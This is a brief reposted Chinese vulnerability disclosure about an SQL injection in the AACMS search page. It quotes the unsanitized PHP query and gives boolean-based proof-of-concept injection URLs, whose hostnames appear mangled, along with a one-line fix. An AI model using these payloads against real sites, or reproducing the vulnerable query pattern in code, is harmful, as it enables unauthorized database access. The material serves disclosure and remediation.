include_once 'common.php';
$keyword = $_REQUEST['keyword']; //.....!@#$% ^&*
if(empty($keyword)) sexit($lang['arg_error']); $where = '';
$where .= " title LIKE '%{$keyword}%'";//%模糊查询,。
$title = '搜索';
.... include template('search');
POC http://HdhCmsTest2cto测试数据 /search.php?keyword=w%'%20and%201=1%20and%20'%'=' //and 1=1 http://HdhCmsTest2cto测试数据 /search.php?keyword=w%'%20and%201=2%20and%20'%'=' //and 1=2 http://HdhCmsTest2cto测试数据 /search.php?keyword={关键字}{SQL}
修复:过滤搜索页面参数输入
查看更多关于AACMS 注射0day及修复 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11324